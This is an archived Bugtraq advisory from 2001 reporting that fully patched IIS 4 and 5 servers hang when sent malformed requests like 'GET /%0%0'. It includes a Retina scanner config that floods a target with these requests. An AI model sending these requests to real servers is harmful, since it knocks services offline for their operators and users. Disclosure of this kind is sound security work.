Home page logo
/

bugtraq logo Bugtraq mailing list archives

DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
From: NtWaK0 <adonis1 () VIDEOTRON CA>
Date: Sat, 13 Jan 2001 11:53:17 -0500

______________________________________________________________________

                      NtWaK0,  SecurHack. Labs
                    Security Advisory  1-13-2001
    DOSSING IIS 4  or IIS5 fully  patched using GET  /%0%0 HTTP/1.0
______________________________________________________________________

oooooooooooooooooo
Vulnerable Systems
oooooooooooooooooo
IIS 4 and IIS 5 even if fully patched.

oooooooo
Synopsis
oooooooo

While playing with miner in retina I  sent this GET /%0%0 HTTP/1.0 to one
of my
IIS  4  and IIS  5  servers, I  noticed  that retina  is  taking a  lot  of
time
to jump to the next defined variable in the brain.ini which should be GET
/%0%1
and so on.

Retina Result
ooooooooooooo

Command: GET /%0%0 HTTP/1.0
Notes::  Connection to server lost.
Error::  10060

Command: GET  /_vti_inf.html%0%0 HTTP/1.0
Notes::  Connection  to server  lost.
Error::  10060 Command:
GET  /_vti_inf.html%0%0 HTTP/1.0
Notes::  Connection  to server lost.
Error::  10060

Pinging the box while running retina even from different subnet it wont
answer.
You can connect to the web but you have to wait forever for it to load.
I have tried that on IIS 4 and II 5 and same result ....

oooooooooooooooo
Proof-Of-Concept
oooooooooooooooo

1- Get Retina From eeye.com
2- Install it
3- Edit the file Brain.ini located
   C:\Program Files\Retina 2.0\Modules\Retina\Miner\brain.ini <default
4- Put this in your brain.ini file
   [General]
   Title=HTTP Miner
   [Commands]
   1=GET /%%cgi-bin%%%%passwordfile%%%%passwordfile%% HTTP/1.0
   [Variables]
   cgi-bin=,
   passwordpath=%0,%1,%2,%3,%4,%5,%6,%7,%8,%9,%a,%b,%c,%d,%e,%f,
5- Run retina and choose miner and type your IP GO :)

Btw that will start sending GET /%0%0 HTTP/1.0 GET /%0%1  HTTP/1.0 etc
To see the result open  up your browser and point  to the IP you are  mining
and
you will notice  you can just  connect and your  LAN in my  case cable is
almost
flooded. Ping the IP you are mining and you will get a Ping time out.

Even if you try to connect to that IP from totally a different network you
wont
be able to view the page or it will take for-ever to load.

oooooooooo
Resolution
oooooooooo
No Idea :(

ooooooo
Credits
ooooooo

The discovery and documentation of  this vulnerability was conducted by
NtWaK0.
For   more  information   Dalnet  channel   #security
______________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.__________
Live Well Do Good                                           |
Accept no limitations                                     \(|)/
                                                           /`\  NtWaK0


  By Date           By Thread  

Current thread:
  • DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0 NtWaK0 (Jan 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]